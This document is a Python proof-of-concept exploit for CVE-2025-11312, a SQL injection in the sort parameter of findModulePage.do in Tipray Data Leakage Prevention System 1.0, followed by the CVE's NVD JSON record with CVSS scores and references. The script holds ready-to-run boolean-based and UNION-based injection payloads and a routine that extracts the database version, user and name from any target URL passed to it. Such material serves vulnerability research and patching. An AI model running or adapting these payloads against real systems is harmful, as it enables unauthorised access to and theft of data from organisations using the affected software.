CVE-2025-11312

# CVE-2025-11312 - Tipray DLP System SQL Injection PoC # Vulnerability: SQL Injection in findModulePage.do via sort parameter # Affected: Tipray Data Leakage Prevention System v1.0 import requests import sys TARGET_URL = "http://target-host" INJECTION_ENDPOINT = "/findModulePage.do" def exploit_sql_injection(target_url, injection_payload): """ Exploit SQL injection vulnerability in sort parameter of findModulePage function. """ url = target_url.rstrip('/') + INJECTION_ENDPOINT # Construct malicious sort parameter with SQL injection payload params = { "sort": injection_payload, # Additional parameters may be required depending on the endpoint "page": "1", "rows": "10" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.get(url, params=params, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") print(f"[+] Response Preview: {response.text[:500]}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def test_boolean_based_sqli(target_url): """Test for boolean-based blind SQL injection""" # True condition payload true_payload = "id ASC, (SELECT CASE WHEN (1=1) THEN 1 ELSE 1/0 END) -- " # False condition payload false_payload = "id ASC, (SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END) -- " true_resp = exploit_sql_injection(target_url, true_payload) false_resp = exploit_sql_injection(target_url, false_payload) if true_resp and false_resp and true_resp != false_resp: print("[+] Boolean-based SQL Injection confirmed!") return True return False def test_union_based_sqli(target_url): """Test for UNION-based SQL injection""" # Determine number of columns first for i in range(1, 11): cols = ",".join([str(x) for x in range(1, i+1)]) payload = f"id; UNION SELECT {cols}-- " resp = exploit_sql_injection(target_url, payload) if resp and "error" not in resp.lower(): print(f"[+] UNION-based SQL Injection possible with {i} columns") return i return None def extract_database_info(target_url): """Extract database version and current user information""" payload = "id; UNION SELECT 1,version(),user(),database()-- " resp = exploit_sql_injection(target_url, payload) return resp if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] print(f"[*] Testing CVE-2025-11312 against: {target}") # Test for boolean-based injection if test_boolean_based_sqli(target): print("[*] Attempting to extract database information...") extract_database_info(target)

{"cve": {"id": "CVE-2025-11312", "sourceIdentifier": "[email protected]", "published": "2025-10-06T01:15:31.610", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. This affects the function findModulePage of the file findModulePage.do. The manipulation of the argument sort results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "25FED908-237A-432E-9605-57E982321BD3"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-4.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327193", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327193", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.663457", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}